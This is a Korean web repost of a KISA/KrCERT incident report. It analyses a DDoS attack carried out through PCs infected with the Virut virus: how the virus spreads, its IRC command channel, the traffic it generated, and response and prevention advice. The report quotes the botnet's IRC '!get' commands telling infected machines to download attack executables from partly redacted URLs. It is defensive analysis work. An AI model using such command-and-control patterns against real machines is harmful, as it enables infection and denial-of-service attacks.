japanese site
온라인강좌책메일다운로드동아리쇼핑기술지원기업정보갤러리동영상 블로그
『신개념 4단계 리눅스기술지원 시스템 공개』

※ 『무료 리눅스 배포판 배송서비스』 ※

 
Virut악성코드를이용한DDoS공격분석
조회 : 6,065  


Virut 악성코드를 이용한 DDoS 공격기법 분석

자료 : 한국정보보호진흥원(KISA)


1. 개 요
최근 국내의 몇몇 인터넷사용 PC가 분산서비스 공격을 위한 Agent로 악용되어 일부 네트
워크에서 악성 트래픽이 발생하였다. 사고 분석결과, Virut 악성코드에 감염되어 있는 PC에
IRC서버를 통하여 명령을 전달, 추가 공격코드를 다운로드․실행하는 방법으로 서비스거부 공
격을 수행하는 것으로 확인되었다. Virut은 PC내에 저장되어있는 실행파일들에 자신을 감염시
키는 방식으로 확산된다. 사용자가 이미 감염된 파일을 USB저장 매체, 네트워크 공유폴더 등
을 통하여 정상PC에서 실행시키면 해당PC도 감염되게 된다. PC가 감염되면 다수의 실행파
일에 바이러스가 삽입되게 되므로 감염이 의심될 경우, 백신을 통한 전체 파일 점검 및 치료를 실
시하는 것이 필요하다.
2. Virut을 이용한 분산서비스 공격기법
o 공격 절차
공격자는 Virut을 전파한 뒤 해당 악성코드에 원격명령을 전달하여 공격모듈을 추가로 설치하는
방법으로 DoS공격을 수행한다.
① Virut 유포 → ② Virut에게 DoS공격모듈 다운로드하도록 명령전달(IRC서버이용) → ③ 공격
모듈 다운로드 ④ 피해사이트로의 DDoS 공격
o 절차별 상세
① Virut 유포방법
공격자는 최초에 사용자가 많이 방문하는 웹사이트 은닉 또는 P2P 공유 등을 통하여
Virut을 유포하였을 것으로 추정된다. Virut은 감염된 PC내의 실행파일들을 감염시키므로,
최초 유포 이후에는 이동저장 매체 또는 네트워크 공유폴더 등을 통하여 전파된다.
KrCERT-AR-2007 http://www.krcert.or.kr
Virut 악성코드를 이용한 DDoS 공격기법 분석 cert@krcert.or.kr
____________________________________________________________________________________________
_____________________________________________________________________________________
② Virut을 통한 DoS 공격모듈 다운로드
Virut에 명령을 전달하여 공격모듈을 설치한다. (공격자는 명령전달을 위하여 IRC
[proxima.[생략].pl]를 이용)
- 명령전달 사이트
proxima.[생략].pl, 포트 TCP 65520, 채널 &virut
- 전달되는 명령내용
- :* PRIVMSG msfplhjz :!get http://85.[생략].2/~grander/adv735.exe
:* PRIVMSG msfplhjz :!get http://dl2.[생략].com/~grander/dl.exe
:* PRIVMSG msfplhjz :!get http://85.[생략].2/~grander/e.exe
<proxima.[생략].pl 통한 명령전달 예>
< 명령 전달 예>
③ Virut은 전달된 명령URL 경로로 접속하여 추가 악성모듈을 다운로드 및 설치한다. (전달 받은
경로 중 아래의 2개의 URL 파일이 DoS 공격 모듈이다. 추가 adv735.exe의 경우 추가적인
악성코드를 다운로드 받는 것으로 확인되었다.)
※ DDoS 관련 공격코드 다운로드 경로
http://dl2.[생략].com/~grander/dl.exe
http://85.[생략].2/~grander/e.exe
<DoS 공격 코드 다운로드>
KrCERT-AR-2007 http://www.krcert.or.kr
Virut 악성코드를 이용한 DDoS 공격기법 분석 cert@krcert.or.kr
____________________________________________________________________________________________
_____________________________________________________________________________________
dl.exe, e.exe가 다운로드 되면 “윈도우폴더Temp"에 VRT[랜덤].tmp 형태로 저장 및
프로세스로 로딩 된다. 윈도우 시작 시 자동시작을 하기 위한 설치 기능이 없으므로, 재부팅하면
더 이상 활동하지 않는다.
<VRT[랜덤].tmp 형태로 프로세스에 로딩됨>
④ 특정사이트에 대한 분산서비스 거부공격
VRT[랜덤].tmp가 로드되면 사이트 http://www.[생략].com에 대한 서비스거부공격이 시작된다.
공격패킷의 형태 및 감염된 단일PC가 발생시키는 트래픽 량은 다음과 같이 관찰되었다.
- DDoS 공격 형태
‣ 공격대상 사이트 : http://www.[생략].com
‣ 프로토콜 및 포트: TCP 80, 443,
UDP 랜덤포트
‣ 패킷 Size: TCP 80, 443 ☞ 66 byte
UDP ☞ 랜덤
KrCERT-AR-2007 http://www.krcert.or.kr
Virut 악성코드를 이용한 DDoS 공격기법 분석 cert@krcert.or.kr
____________________________________________________________________________________________
_____________________________________________________________________________________
- 단일 감염PC에서의 트래픽 발생량
공격패킷 종류 패킷발생 빈도 /초당 초당 발생 트래픽 량
http (TCP80) 23 회 1,520 byte
https (TCP443) 4 회 237 byte
UDP 9,346 회 6,049,570 byte
총합 9,373 회 6,051,327 byte (48Mbps)
<http (TCP80) 분당 트래픽 발생 예 >
<https (TCP443) 분당 트래픽 발생 예 >
<UDP 초당 트래픽 발생 예 >
<UDP Payload 분석 ☞ UDP Payload는 크기와 내용에 규칙성이 없음>
KrCERT-AR-2007 http://www.krcert.or.kr
Virut 악성코드를 이용한 DDoS 공격기법 분석 cert@krcert.or.kr
____________________________________________________________________________________________
_____________________________________________________________________________________
KrCERT-AR-2007 http://www.krcert.or.kr
Virut 악성코드를 이용한 DDoS 공격기법 분석 cert@krcert.or.kr
____________________________________________________________________________________________
_____________________________________________________________________________________
3. 위험성 분석
o Virut에 의하여 설치되는 VRT[랜덤].tmp 공격모듈은 대량의 트래픽을 유발하는 것으로 확인되었다.
단일 테스트 PC에서 초당 48Mbps의 대량 트래픽이 발생하는 것으로 관찰 되었으므로, 사내 네트워
크의 서비스 저하에 큰 영향을 미칠 수 있다.
o 공격자는 명령전달을 위한 proxima.[생략].pl 도메인의 resolving IP를 수시로 변경한다.
o 확실한 예방을 위하여 Virut 악성코드에 대한 근본적인 치료가 요구된다.
4. 감염시 대응방법
o Virut는 감염 PC 내의 많은 실행파일들을 감염시키므로, 감염이 확인될 경우, 사용자는
백신으로 전체 파일시스템에 대하여 점검 및 치료하여야 한다.
o 감염 시 악성 트래픽이 발생할 수 있으므로, 완전한 치료가 이루어지기 전에 네트워크로
부터 격리시키도록 한다.
5. 예방방법
o 네트워크 또는 이동식 저장매체 등 (네트워크 공유폴더 파일, P2P 공유파일, 이동식 USB등)
외부로부터 전달된 파일은 사용 전에 반드시 백신으로 점검하도록 한다.


[원글링크] : https://www.linux.co.kr/home2/board/subbs/board.php?bo_table=lecture&wr_id=1573


이 글을 트위터로 보내기 이 글을 페이스북으로 보내기 이 글을 미투데이로 보내기

 
krcert
인터넷 침해사고대응지원센터의
허락하에 본 사이트에서 pdf 파일 형식으로 배포 됩니다.

 
   
 


『신개념 4단계 리눅스기술지원 시스템 공개』

CentOS 리눅스 전문서적 국내최초출시

 
회사소개 | 보도기사 | 채용안내 | 광고안내 | 이용약관 | 개인정보취급방침 | 책임한계와 법적고지 | 불편사항 신고하기 | 사이트맵
ㅇ 서울 : 서울특별시 강남구 노현로79길 66, 402호(역삼동,청송빌딩)  ㅇ 부산 : 부산광역시 해운대구 우동 1470 에이스하이테크21 914호
ㅇ 대표 : 1544-8128 ㅇ부산직통 : 051-744-0077 ㅇ서울직통 : 02-856-0055 ㅇ FAX : 02-6280-2663
ㅇ 사업자번호 : 128-86-68239 ㅇ 통신판매업 신고번호 : 2013-부산금정-0035호 ㅇ 개인정보책임자 : 이재석
ㅇ 상호명 : (주) 수퍼유저 ㅇ 대표자 : 박성수
Copyright ⓒ (주)수퍼유저. All rights reserved.

 아 이 디
 비밀번호
회원 가입 | 비밀번호 찾기

블로그~
 
▷ 해킹보안
PC보안(Windows)
리눅스 보안
해킹/보안 프로그램
네트웍 장비 보안
해커즈랩 문제 분석
개념/기타
ACL(Access Control List)
DoS/DDoS
웜/악성코드
책제목
리눅스서버관리실무바이블v3.0


저자 박성수
페이지수 2,032 pages
펴낸곳(주)수퍼유저

리눅스 서버 구축 및 관리에 필요한 거의 모든 부분과 전반적인 실무 기법들을 다루고 있음
책제목
리눅스보안관리실무(2/E)


저자홍석범
페이지수 820 pages
펴낸곳(주)수퍼유저

리눅스 보안에 관련된 내용을 종합적으로 쓴 책. 저자의 명성 그대로 보안관련의 모든 내용이 그대로 담겨져 있다.